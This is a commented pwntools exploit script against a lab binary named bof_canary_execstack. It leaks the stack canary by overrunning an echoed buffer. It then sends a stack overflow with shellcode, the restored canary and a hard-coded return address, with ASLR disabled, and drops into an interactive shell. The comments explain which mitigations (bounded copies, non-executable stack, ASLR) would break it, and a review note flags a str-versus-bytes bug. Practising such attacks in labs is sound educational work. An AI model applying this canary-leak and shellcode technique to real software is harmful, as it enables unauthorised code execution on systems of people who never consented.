# Lab script against ./bof_canary_execstack. It runs in two stages: read the
# stack canary back out of the target's echo, then send an overflow that
# restores the canary and replaces the saved return address.
#
# What the script depends on, as visible below:
#   * the target echoes more bytes than were sent (the seven bytes after the
#     probe are read as the canary), which suggests an unterminated or
#     length-unchecked read in the target -- confirm against its source;
#   * ASLR is switched off for the child process, so the hard-coded stack
#     address in stage 2 stays valid;
#   * presumably the stack is executable, going by the binary's name.
# Bounding the copy by the buffer size, a non-executable stack, or leaving
# ASLR enabled would each break one of these assumptions.
from pwn import *

# Raw bytes of the stage-2 code, read from a file next to the script.
with open("shellcode", "rb") as fh:
    shellcode = fh.read()

# aslr=False asks pwntools to disable address randomisation for the child.
proc = process("./bof_canary_execstack", aslr=False)
gdb.attach(proc)
sleep(0.3)  # short pause after attaching the debugger

# Stage 1: 0x39 filler bytes. Stage 2 places the canary at offset 0x38, so
# the last probe byte lands on the canary's first byte -- presumably the
# terminating NUL that would otherwise stop the echo.
probe = b"a" * 0x39
# NOTE(review): str is passed where pwntools expects bytes on Python 3.
proc.sendline(str(len(probe)))
proc.send(probe)
proc.recvn(len(probe))  # discard the echo of the probe itself
# The next seven bytes are taken as the rest of the canary; the low byte
# that the probe overwrote is restored as zero.
canary = b"\x00" + proc.recvn(7)
info("canary: 0x{:016x}".format(u64(canary)))
proc.clean()  # drop any remaining buffered output

# Stage 2 layout: shellcode padded to 0x38 | canary | 8 zero bytes
# (presumably the saved frame pointer) | new return address.
# 0x7fffffffe1d0 is a fixed stack address, presumably the start of the
# buffer as seen in the debugger; it only holds for this no-ASLR setup.
payload = (
    shellcode.ljust(0x38, b"a")
    + canary
    + p64(0)
    + p64(0x7fffffffe1d0)
)
proc.sendline(str(len(payload)))
proc.send(payload)
proc.interactive()